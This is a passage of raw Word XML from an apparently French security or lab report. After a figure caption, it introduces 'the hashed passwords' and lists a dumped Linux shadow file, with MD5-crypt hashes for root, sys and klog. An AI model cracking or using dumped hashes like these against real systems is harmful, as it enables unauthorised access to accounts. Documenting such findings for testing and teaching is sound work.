        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0715B1" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E8D0BC5" wp14:editId="3FEB1810">
            <wp:extent cx="4743069" cy="2959190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="206776493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64938" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4748187" cy="2962383"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41C5EF" w14:textId="14C00FF3" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFA02EF" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376A2457" w14:textId="38C93767" w:rsidR="00FE5DA9" w:rsidRPr="00CD27EA" w:rsidRDefault="005B498A" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD27EA">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Voici les différents mots de passes </w:t>
      </w:r>
      <w:r w:rsidR="00CD27EA" w:rsidRPr="00CD27EA">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>hachés</w:t>
      </w:r>
      <w:r w:rsidR="00FE5DA9" w:rsidRPr="00CD27EA">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DD2404" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE93B59" w14:textId="54AACC3D" w:rsidR="00FE5DA9" w:rsidRPr="00F21569" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F21569">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F21569">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3796A58A" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>daemon:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="295981AA" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bin:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69D02B20" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>99999:7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="721358B1" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sync:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B3E77FB" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>games:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="568DD7C9" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>man:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A9C20C0" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72A11A59" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mail:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="297CB5CE" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>news:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="305761D9" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>uucp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23519CA6" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>proxy:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CF3457A" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>www-data:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6BBD237F" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>backup:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5207B898" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>list:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D4189FF" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>irc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2657A8E5" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>gnats:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BF727F2" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nobody:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23C41EB8" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>libuuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:!:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>14684:0:99999:7:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB4E56" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>dhcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="39591CBF" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>syslog:*:14684:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AB0AD9F" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>klog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5DA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57016542" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRPr="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="001144B0">
      <w:pPr>
